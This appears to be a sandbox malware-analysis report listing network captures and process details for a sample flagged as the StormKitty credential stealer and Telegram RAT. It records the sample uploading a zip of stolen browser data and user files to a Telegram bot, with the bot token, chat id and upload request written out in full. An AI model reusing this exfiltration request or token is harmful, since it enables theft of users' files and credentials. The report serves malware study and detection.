Apr 16, 2024 14:27:03.609399080 CEST	20624	OUT	Data Raw: 75 39 72 70 54 56 34 6d 25 32 66 64 64 25 32 62 33 6f 25 32 62 6c 32 43 34 54 70 69 36 52 25 32 62 4a 63 62 4b 65 70 53 61 4e 30 47 62 4c 62 45 53 79 6f 72 6f 4b 70 7a 78 63 75 30 36 4e 76 32 73 50 66 6f 39 55 4c 53 61 6f 7a 51 25 32 62 25 32 66 Data Ascii: u9rpTV4m%2fdd%2b3o%2bl2C4Tpi6R%2bJcbKepSaN0GbLbESyoroKpzxcu06Nv2sPfo9ULSaozQ%2b%2fn6UEF4Mn2Qz%2bG3sqEIYvqM3L9d34QyxOD0wJ0%2bNkvyIEYzGoQslrWCarAy%2bLrDIUajWsaQG4HbixluEyvlVje4qleDVH%2fz6AMVjRwYhrRC55gEwpuIBFkk47W%2bHFQ4SXIwvW8Oe%2fWGgQNCyAZRU8c
Apr 16, 2024 14:27:04.203579903 CEST	203	IN	HTTP/1.1 200 OK Date: Tue, 16 Apr 2024 12:27:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Timestamp	Bytes transferred	Direction	Data
2024-04-16 12:27:02 UTC	112	OUT	GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1 Host: api.mylnikov.org Connection: Keep-Alive
2024-04-16 12:27:03 UTC	785	IN	HTTP/1.1 200 OK Date: Tue, 16 Apr 2024 12:27:03 GMT Content-Type: application/json; charset=utf8 Content-Length: 88 Connection: close Access-Control-Allow-Origin: * Cache-Control: max-age=2678400 CF-Cache-Status: MISS Last-Modified: Tue, 16 Apr 2024 12:27:03 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=drQ2VK%2FzpzDCiLpkIqdJCxnctk4GI4RjjWO0fBd1CaUE3e9OuDFxbKyBZv%2BbB%2F3SQ4T2PI0oUBQY8Mpg39680uym5juE%2FuAa6Ac8DPv%2FbJmRRiycnpCkLtUV6TPl6h9Pk%2FqX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=0; preload X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 87542ace396e450d-ATL alt-svc: h3=":443"; ma=86400
2024-04-16 12:27:03 UTC	88	IN	Data Raw: 7b 22 72 65 73 75 6c 74 22 3a 34 30 34 2c 20 22 64 61 74 61 22 3a 7b 7d 2c 20 22 6d 65 73 73 61 67 65 22 3a 36 2c 20 22 64 65 73 63 22 3a 22 4f 62 6a 65 63 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 22 2c 20 22 74 69 6d 65 22 3a 31 37 31 33 32 37 30 34 32 33 7d Data Ascii: {"result":404, "data":{}, "message":6, "desc":"Object was not found", "time":1713270423}

Timestamp	Bytes transferred	Direction	Data
2024-04-16 12:27:02 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-04-16 12:27:02 UTC	468	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (chd/079C) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-eus2-z1 Cache-Control: public, max-age=153396 Date: Tue, 16 Apr 2024 12:27:02 GMT Connection: close X-CID: 2

Timestamp	Bytes transferred	Direction	Data
2024-04-16 12:27:03 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-04-16 12:27:03 UTC	531	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-Azure-Ref: 0rcGnYgAAAAANOnx9vccHTr21ROgX9ESTU0pDRURHRTAzMDkAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm Cache-Control: public, max-age=153405 Date: Tue, 16 Apr 2024 12:27:03 GMT Content-Length: 55 Connection: close X-CID: 2
2024-04-16 12:27:03 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Timestamp	Bytes transferred	Direction	Data
2024-04-16 12:27:05 UTC	278	OUT	POST /bot5444063802:AAFQNx_Hpow_i63EVEkfhenefbLEXQSAzbY/sendDocument?chat_id=1126217452 HTTP/1.1 Content-Type: multipart/form-data; boundary="b0e207a3-07fa-498b-b8fa-a48a2fe21eb9" Host: api.telegram.org Content-Length: 197085 Expect: 100-continue Connection: Keep-Alive
2024-04-16 12:27:05 UTC	40	OUT	Data Raw: 2d 2d 62 30 65 32 30 37 61 33 2d 30 37 66 61 2d 34 39 38 62 2d 62 38 66 61 2d 61 34 38 61 32 66 65 32 31 65 62 39 0d 0a Data Ascii: --b0e207a3-07fa-498b-b8fa-a48a2fe21eb9
2024-04-16 12:27:05 UTC	107	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 36 44 39 37 43 36 32 34 44 37 2e 7a 69 70 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 36 44 39 37 43 36 32 34 44 37 2e 7a 69 70 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=6D97C624D7.zip; filename*=utf-8''6D97C624D7.zip
2024-04-16 12:27:05 UTC	16355	OUT	Data Raw: 50 4b 03 04 14 00 00 00 00 00 6f 00 91 58 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 42 72 6f 77 73 65 72 73 5c 45 64 67 65 5c 50 4b 03 04 14 00 00 00 00 00 6f 00 91 58 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 42 72 6f 77 73 65 72 73 5c 47 6f 6f 67 6c 65 5c 50 4b 03 04 14 00 00 00 08 00 60 73 90 58 51 33 92 06 4a 00 00 00 69 00 00 00 1e 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 42 6f 6f 6b 6d 61 72 6b 73 2e 74 78 74 53 56 56 56 70 4f 2d 51 f0 48 cd 29 50 50 56 56 e6 02 62 05 e7 d2 e2 92 fc dc cc aa 54 05 b7 cc a2 d4 b4 fc 0a b8 0c 48 a9 67 5e 59 7e 4e 59 6a 0a 5c d0 31 29 bf b4 44 21 b4 18 59 55 49 66 5e ba 42 70 49 62 51 09 54 21 00 50 4b 03 04 14 00 00 00 08 00 60 73 90 58 63 c2 65 e7 53 00 00 00 5e 00 00 00 1c 00 00 00 42 Data Ascii: PKoXBrowsers\Edge\PKoXBrowsers\Google\PK`sXQ3JiBrowsers\Firefox\Bookmarks.txtSVVVpO-QH)PPVVbTHg^Y~NYj\1)D!YUIf^BpIbQT!PK`sXceS^B
2024-04-16 12:27:05 UTC	16355	OUT	Data Raw: 3d 08 05 cf d4 2d bc eb 17 ba 68 a5 a9 e7 f9 90 33 fe 18 83 b3 a9 c0 ad de 10 57 78 29 1f 46 01 de 10 40 32 39 7c e3 68 69 10 61 d4 41 ae a1 31 30 4f 7b 43 32 88 77 46 25 97 ad af 01 ae 5a 53 24 6b 83 ab 3b 6d e9 3b 51 aa 33 88 4d 66 f3 19 8f 5f f3 6a 88 9f 76 5f 31 c1 4d 48 75 29 73 65 da 38 a9 56 41 68 e9 b3 19 e4 6e bf bf 2f 28 cc 7a f2 36 4c 75 c2 47 e5 72 7a db 71 af c2 59 02 b6 30 94 29 39 1b 7b 52 99 d3 e5 7d fd 80 60 21 89 19 58 e2 ac d8 5f 96 7c a0 e7 79 fc f1 42 1d ec 4e 2f d7 64 76 d5 f6 a8 d4 2b 32 fc 43 77 a2 e6 87 49 35 cd df 7e d5 0c b7 50 7d e9 fc 25 5e fa 90 b1 5e 5b 5f f3 11 0d f6 b4 a8 9c 29 8c 0f 5f a9 33 63 7d cf ce 4f cd cb 6b ba f5 fc 22 09 18 7b 6c 7c 5f 17 ff d4 da 6c 9e 4e 1f 9e 5f d6 e7 53 77 cb 30 90 cf bc 81 78 1a af e8 c9 56 Data Ascii: =-h3Wx)F@29\|hiaA10O{C2wF%ZS$k;m;Q3Mf_jv_1MHu)se8VAhn/(z6LuGrzqY0)9{R}`!X_\|yBN/dv+2CwI5~P}%^^[_)_3c}Ok"{l\|_lN_Sw0xV
2024-04-16 12:27:05 UTC	16355	OUT	Data Raw: 5b 5f f3 11 0d f6 b4 a8 9c 29 8c 0f 5f a9 33 63 7d cf ce 4f cd cb 6b ba f5 fc 22 09 18 7b 6c 7c 5f 17 ff d4 da 6c 9e 4e 1f 9e 5f d6 e7 53 77 cb 30 90 cf bc 81 78 1a af e8 c9 56 1c 4b 41 13 b4 57 e6 1b 69 4f b4 85 2c f1 ad 1c bb 04 7e 4d 92 63 1d 37 34 d8 98 e7 b2 6d cf ad 3f 4a 15 bc 0f 82 14 68 c4 2f 5e b4 2d 7f d6 ff fe fc 01 50 4b 03 04 14 00 00 00 08 00 1a 82 44 57 03 c0 74 a0 84 02 00 00 02 04 00 00 3e 00 00 00 47 72 61 62 62 65 72 5c 44 52 49 56 45 2d 43 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 44 65 73 6b 74 6f 70 5c 53 51 53 4a 4b 45 42 57 44 54 5c 5a 47 47 4b 4e 53 55 4b 4f 50 2e 6a 70 67 15 93 d9 91 40 21 08 04 ff b7 6a 83 f2 c0 5b 3c 40 9f 98 7f 20 eb 06 40 31 4c 37 d7 fb 8c b4 72 eb b5 77 0c fb 86 34 fc 06 37 a2 64 30 96 f5 5a 78 ad a0 1f 18 Data Ascii: [_)_3c}Ok"{l\|_lN_Sw0xVKAWiO,~Mc74m?Jh/^-PKDWt>Grabber\DRIVE-C\Users\user\Desktop\SQSJKEBWDT\ZGGKNSUKOP.jpg@!j[<@ @1L7rw47d0Zx
2024-04-16 12:27:05 UTC	16355	OUT	Data Raw: 55 16 c6 f8 ed 67 67 4e 67 41 99 77 ec 56 a0 be ff ab 98 12 28 a6 df 9f 3f 50 4b 03 04 14 00 00 00 08 00 1a 82 44 57 d9 1d 2b b8 86 02 00 00 02 04 00 00 41 00 00 00 47 72 61 62 62 65 72 5c 44 52 49 56 45 2d 43 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 42 4e 41 47 4d 47 53 50 4c 4f 5c 42 4e 41 47 4d 47 53 50 4c 4f 2e 64 6f 63 78 0d 93 49 92 45 21 08 04 f7 1d f1 0f 25 2a ce a0 a2 cf e1 fe 07 69 37 ac 8c a0 c8 2c 81 94 2b 4e 6a e6 46 29 7f 6d 9d b3 8e 33 83 82 f7 55 5c 3a 40 40 0e e5 ba 73 70 7e 24 7c 86 2a b7 72 e0 54 10 97 89 e1 e8 e8 c6 ba 52 b6 32 20 d1 d8 64 46 dd e6 3b 10 2e 66 19 18 e4 6c 95 d4 69 ab 66 83 6a ed 4d 43 3e df b3 0e 44 a3 47 5f 00 9b 6a e0 b1 8b 37 a6 c7 eb 02 0a a3 74 36 5b 2f 0c f3 f6 dd 9b b0 ae b2 d3 26 Data Ascii: UggNgAwV(?PKDW+AGrabber\DRIVE-C\Users\user\Documents\BNAGMGSPLO\BNAGMGSPLO.docxIE!%i7,+NjF)m3U\:@@sp~$\|rTR2 dF;.flifjMC>DG_j7t6[/&
2024-04-16 12:27:05 UTC	16355	OUT	Data Raw: f6 23 0a ab 99 53 c0 fb ed 3a 8e 85 01 76 bb 46 d0 94 d5 8d a3 f3 23 05 b5 67 cc 92 2b a4 31 3a f7 ce 99 46 aa a6 72 91 0b 90 e7 c1 7e f7 b9 f2 81 03 5b dc 50 da 68 88 b4 d3 83 55 f4 b1 cb 25 99 96 72 82 28 37 d4 f4 12 ed 12 47 dc 60 33 7d 45 5d df a7 95 2b 63 75 0e 73 e7 5c 5a 3d cf c7 c9 9a 0b 6b 57 a5 bc 2b 42 96 c7 67 ce fd 86 d6 9f d5 54 f3 f2 31 0f af 2b dc 90 cc a4 1e 4b 0c dc 58 fb ef a3 d0 10 37 26 f4 e3 3d b6 6a fb 91 63 59 61 aa a5 8a 77 c1 35 dd 1e ec 97 c1 e8 de af a6 ef 24 5d d7 17 75 df c1 ed 7b a2 25 52 5d ee ed 56 31 9b e0 ee 07 1b ab f2 e3 52 a2 e6 33 91 1d 31 68 fe 9a c3 dc c4 c9 8b 7b 4a 3d 46 1c 57 9a 5b 15 1d 22 c4 1a 41 29 38 3e 41 5a 7a 3e 96 9e 58 cb 53 f6 56 ec 9a 0b 7e b1 a9 68 8c 90 fd 76 ee f3 d8 66 d3 4c 33 28 7e c5 88 85 b2 Data Ascii: #S:vF#g+1:Fr~[PhU%r(7G`3}E]+cus\Z=kW+BgT1+KX7&=jcYaw5$]u{%R]V1R31h{J=FW["A)8>AZz>XSV~hvfL3(~
2024-04-16 12:27:05 UTC	16355	OUT	Data Raw: ad 4e 8d df f8 a8 9e 3c 17 26 44 00 26 b5 0b 01 1e d7 dc 7e 99 93 0f ed 25 f9 b9 81 6f 8e 6e b2 96 9f 94 c9 2d eb 9e 4f 0f ac 19 b2 11 1e 44 8a 7e 07 68 ca cd 1f 8b b5 dc a7 2a fc 2b c0 bf 02 fc 2b c0 7f 34 00 e9 df 99 74 96 e3 58 e9 d1 47 e4 29 d7 ed 0f 45 54 81 e4 37 cc 01 77 bb 2f 40 2c 91 68 8f c3 0b 20 fc 02 9c 6f 6a 32 a2 67 47 18 48 51 3c e0 b5 3f 5e be 00 7d d1 e4 1f a0 2f 40 66 c0 ed 79 c9 1e 3c 76 9c 8b f8 2b bf 88 d5 67 af 17 60 b3 37 16 62 f8 02 8c 8a 3d 7a 4e 5d a9 c1 ff a3 5b de 91 ce 0b 70 39 fa 02 90 f1 88 e0 c2 20 cd 55 bc 00 bb 59 cf c2 56 ff 08 a8 2a 03 48 fc 93 c4 d2 bf 9d 7e ba a7 d7 7a a3 7e 76 c3 a3 df 89 0a 3a c0 b4 3e a0 72 f8 b7 14 e3 ff 18 f1 5d df 58 8a b1 5f 64 df 1a 3d e4 1f 99 b8 ff 31 a7 a2 dc c0 7f 3a f5 6c d8 d4 13 48 ef Data Ascii: N<&D&~%on-OD~h++4tXG)ET7w/@,h oj2gGHQ<?^}/@fy<v+g`7b=zN][p9 UYVH~z~v:>r]X_d=1:lH
2024-04-16 12:27:05 UTC	16355	OUT	Data Raw: 28 cc bb 96 47 31 7d 81 ac 59 9d 89 a6 48 1b a9 5a bc 40 49 a4 89 ae 64 1e 13 bd 67 1b 58 d0 8b ce 8a 5b b2 aa 0a 7c 8b d7 11 db c2 b2 a7 06 7c 86 ae e3 2b ea 28 ca ba 29 83 a2 a3 b3 1d e4 f4 67 41 7f 6e 96 0d a8 cc d2 dd cd 59 18 af 1b f7 93 27 d5 8d 01 a4 fe ff 51 ca 17 0e b7 a3 80 af 1a 73 18 6d 48 fa ac 32 55 91 87 47 d8 a4 66 d6 cc 7e 45 96 0c 16 94 58 7d 49 bf f9 2b 14 16 e0 1f d0 14 59 b6 19 4e 51 0b 61 21 07 d5 cf 9e 6c d7 37 cb f2 c5 66 21 81 03 cf 24 e5 ce be 0a 44 96 29 2a da 0d db 27 87 3a f6 eb 5f c2 fd 8a 3c 5b db 32 9f cf 8d 5c b3 c8 46 19 67 7f 27 30 a0 0b f4 58 13 8a ed e3 96 81 25 1f e4 63 08 68 e9 0c e5 2c ad 3c 8b 98 59 d6 e6 7e 6f 45 8d 51 d6 bf 13 9e b6 52 5f 61 79 50 c7 81 29 a9 2f e2 80 04 5d 62 fa 26 f0 37 54 33 b8 f0 2b 87 ed ac Data Ascii: (G1}YHZ@IdgX[\|\|+()gAnY'QsmH2UGf~EX}I+YNQa!l7f!$D)*':_<[2\Fg'0X%ch,<Y~oEQR_ayP)/]b&7T3+
2024-04-16 12:27:05 UTC	16355	OUT	Data Raw: 38 a4 db 4c ee dc e2 d4 13 1e 62 cd 68 95 41 12 84 b4 7d 79 71 fe e2 aa 65 81 a6 30 e7 98 a6 1c ef f0 54 67 85 60 27 2a 77 bc e3 78 a0 01 d1 c6 ad 81 6b 9d 46 e5 a2 73 b9 ad 11 92 75 52 62 12 f2 53 9f 78 63 ac cb b7 29 93 9a 86 84 9f 81 e6 2e 74 03 1f ac da 54 e1 fa 3f e8 c5 f0 96 26 09 63 a7 a9 4e 98 8c d3 8c 73 1a 08 48 3b 9e 2b 21 67 08 50 52 e5 3d ea 88 7d 40 28 42 d7 7b ed 89 f9 49 20 4f cf 68 f2 09 d5 e5 fe 19 50 d1 bf 7b 71 68 dd a5 31 0e 9b 86 7c 31 31 a1 20 c0 05 ae bb 8b 2a 36 57 ae 92 34 6c f3 76 12 4f 93 b0 be 1c 84 33 85 f5 df 14 a7 90 3a 1b 35 d9 9a 7e 3f e9 25 dc 0f 12 97 2f 75 11 2c 64 cc 6d e3 6f 25 49 09 d3 85 cb 05 32 1b ae c8 a5 5e 7e 2e 8b eb 74 bd d7 87 3b 23 c6 ff 46 75 b2 f4 4d 25 fd 90 f8 28 65 2d 1a 5b 57 c7 dd 76 c6 9d f3 57 93 Data Ascii: 8LbhA}yqe0Tg`'wxkFsuRbSxc).tT?&cNsH;+!gPR=}@(B{I OhP{qh1\|11 6W4lvO3:5~?%/u,dmo%I2^~.t;#FuM%(e-[WvW
2024-04-16 12:27:05 UTC	25	IN	HTTP/1.1 100 Continue
2024-04-16 12:27:06 UTC	852	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 16 Apr 2024 12:27:06 GMT Content-Type: application/json Content-Length: 464 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":21253,"from":{"id":5444063802,"is_bot":true,"first_name":"quakerz","username":"quakerz_bot"},"chat":{"id":1126217452,"first_name":"N3cro","last_name":"M4ncer","username":"N3croM4nc","type":"private"},"date":1713270426,"document":{"file_name":"6D97C624D7.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAJTBWYebpqW0XKCOs9qCDAvOdaEpasdAALNEgACWmPwUGx3NPjDAAF9ZzQE","file_unique_id":"AgADzRIAAlpj8FA","file_size":196894}}}

Timestamp	Bytes transferred	Direction	Data
2024-04-16 12:27:12 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=9pAT4RKKfEeELv4&MD=nfkaylzL HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-04-16 12:27:12 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 2dad698e-e885-4868-8bd6-3dd2340a6063 MS-RequestId: e8418874-5062-4c95-8646-33ab356946fa MS-CV: 87rxDT0IZEyTbpE/.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Tue, 16 Apr 2024 12:27:11 GMT Connection: close Content-Length: 24490
2024-04-16 12:27:12 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-04-16 12:27:12 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Timestamp	Bytes transferred	Direction	Data
2024-04-16 12:27:50 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=9pAT4RKKfEeELv4&MD=nfkaylzL HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-04-16 12:27:51 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160" MS-CorrelationId: cd2b66c8-2b23-4041-8f26-559fb0bf9aab MS-RequestId: 5dfb538d-1ea5-4f53-8f38-a795620b3887 MS-CV: /HzkuJDXEka2xisK.0 X-Microsoft-SLSClientCache: 2160 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Tue, 16 Apr 2024 12:27:49 GMT Connection: close Content-Length: 25457
2024-04-16 12:27:51 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92 Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
2024-04-16 12:27:51 UTC	9633	IN	Data Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq

Target ID:	0
Start time:	14:26:51
Start date:	16/04/2024
Path:	C:\Users\user\Desktop\HTZ4az17lj.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\HTZ4az17lj.exe"
Imagebase:	0x295f4c30000
File size:	69'136 bytes
MD5 hash:	CEB9E6829D00AD6E8F25B30D77ABA83F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000002.2116685622.0000029580001000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Target ID:	2
Start time:	14:26:55
Start date:	16/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	"schtasks.exe" /query /TN WinTask
Imagebase:	0x7ff73e180000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	6
Start time:	14:26:56
Start date:	16/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	12
Start time:	14:27:00
Start date:	16/04/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
